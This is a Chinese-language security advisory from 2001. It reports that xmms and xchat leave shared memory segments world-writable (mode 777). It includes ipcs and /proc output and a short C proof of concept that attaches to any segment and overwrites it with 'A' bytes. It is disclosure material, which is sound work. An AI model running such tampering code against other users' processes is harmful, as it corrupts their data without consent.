xmms/xchat 可以全部访问共享内存段发布时间:2001-11-06 更新时间:2001-11-06 严重程度:高 威胁程度:服务器信息泄露 错误类型:设计错误 利用方式:服务器模式 受影响系统 xmms/xchat详细描述 xmms/xchat 测试代码 slackware 8 : bash-2.05$ ipcs -m ------ Shared Memory Segments -------- key shmid owner perms bytes nattch status 0x00000000 4216960 mayhem 777 196608 2 dest 0x00000000 7636737 mayhem 777 196608 2 dest bash-2.05$ ipcs -p -m ------ Shared Memory Creator/Last-op -------- shmid owner cpid lpid 4216960 mayhem 3921 1406 7636737 mayhem 26206 26209 bash-2.05$ cat /proc/3921/cmdline ; echo /opt/gnome/bin/xmms bash-2.05$ cat /proc/26206/cmdline ; echo /opt/gnome/bin/xchat bash-2.05$ Seems not to be exploitable (no fault) but still need to be fixed . /* ** test_shm.c ** ** Made by Julien Vanegue ** Login <mayhem@hert.org> */ #include <sys/types.h> #include <sys/ipc.h> #include <sys/shm.h> #include <stdio.h> #include <stdlib.h> #define FATAL(str) { perror(str); exit(-1); } void usage() { fprintf(stderr, "syntax: a.out semid size \n"); exit(-1); } int main(int argc, char **argv) { char *addr; if (argc != 3) usage(); if ((addr = shmat(atoi(argv[1]), 0, 0)) == (void *) -1) FATAL("shmget"); memset(addr, 'A', atoi(argv[2])); sleep(2); } 解决方案 尚无 相关信息 Julien VANEGUE (vanegu_j@epita.fr) 参考:http://archives.neohapsis.com/archives/bugtraq/2001-11/0015.html |
